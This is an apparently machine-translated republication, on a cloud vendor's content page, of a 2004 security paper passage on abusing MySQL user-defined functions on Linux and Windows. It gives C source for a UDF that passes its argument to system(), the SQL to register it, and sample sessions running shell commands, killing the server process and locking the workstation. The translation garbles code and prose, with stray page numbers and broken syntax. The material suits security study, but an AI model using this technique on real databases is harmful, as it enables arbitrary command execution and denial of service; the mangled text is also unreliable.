Use of MYSQL user-defined functions (udfs) in Linux

Source: Internet
Author: User

In Linux, the use of MYSQL user-defined functions (UDF) Chris Anley [chris@ngssoftware.com] 5th July 2004 according to the scalability mechanism of MySQL function family, this means that you can CREATE a dynamic library containing user-defined functions to CREATE user-defined functions. for short, udfs use the create function statement to implement this mechanism. func' table input information to load them. when MYSQL loads these dynamic libraries, the file path of the dynamic library must be accessible by MYSQL. attackers will abuse this mechanism to create malicious dynamic library files with ulterior motives and use them to SELECT... The into outfile statement is written to an available Directory. After these files are created successfully, an attacker enters information INTO the mysql. func table through insert to configure MYSQL to load these dynamic library files and execute these functions. The following is a fairly simple code of the UDF link library (forgive him for being very simple) (foreigners are very polite !): # Include <stdio. h> # include <stdlib. h>/* compile with something likegcc-g-c example-g-shared-W1,-soname, so_system.so.0-o so_system.so.0.0 so_system.o-lc */enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT}; typedef struct st_udf_args {unsigned int arg_count;/* Number of arguments */enum Item_result * arg_type;/* Pointer to item_results */char ** args; /* Pointer Argument */unsigned long * lengths;/* Length of string arguments */char * maybe_null;/* Set to 1 for all maybe_null args */Page 18} UDF_ARGS; typedef struct st_udf_init {char maybe_null;/* 1 if function can return NULL */unsigned int decimals;/* for real functions */unsigned long max_length; /* For string functions */char * ptr;/* free pointer for function data */char const_item;/* 0 if result I S independent of arguments */} UDF_INIT; int do_system (UDF_INIT * initid, UDF_ARGS * args, char * is_null, char * error) {if (args-> arg_count! = 1) return 0; system (args-> args [0]); return 0;} Add a function like this: mysql> create function do_system returns integer soname' so _ system. so '; Query OK, 0 rows affected (0.00 sec) now table mysql. func is similar to this. Of course, you can use update to modify it. Mysql> select * from mysql. func; + ---- + -- + ----- + ---- + | name | ret | dl | type | + ---- + -- + ----- + ---- + | do_system | 2 | so_system.so | function | + ---- + -- + ----- + ---- + 1 row in set (0.00 sec) call the function: mysql> select do_system ('ls>/tmp/test.txt '); + ----------- + | do_system ('ls>/tmp/test.txt ') | + ----------- + |-4665733612002344960 | + ----------- + 1 row in set (0.02 sec) even if the file permission does not allow us to create our own dynamic library file on the target system, we may still use existing functions Achieve some evil intentions. The difficulty for attackers is that the function parameter list does not match the MySQL UDF function prototype: int xxx (UDF_INIT * initid, UDF_ARGS * args, char * is_null, char * error )...... Despite the fact that sophisticated attackers may be able to design vulnerabilities that can be controlled in the dynamic library of the calling system to execute arbitrary code, it is still difficult. Page 19 when MySQL parses and executes the passed parameters, it is still possible to perform "bad" tasks through functions in the existing dynamic library. For example, you can call the function ExitProcess as a mysql udf in windows, which immediately causes the exit, even if you do not have the shutdown permission in mysql. Mysql> create function ExitProcess returns integer soname 'kernel32'; Query OK, 0 rows affected (0.17 sec) mysql> select exitprocess (); ERROR 2013: lost connection to MySQL server during query You can also talk about the logon session lock of the current workstation (equivalent to ctrl + del alt): mysql> create function LockWorkStation returns integer soname 'user32'; Query OK, 0 rows affected (0.00 sec) mysql> select LockWorkStation ();

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.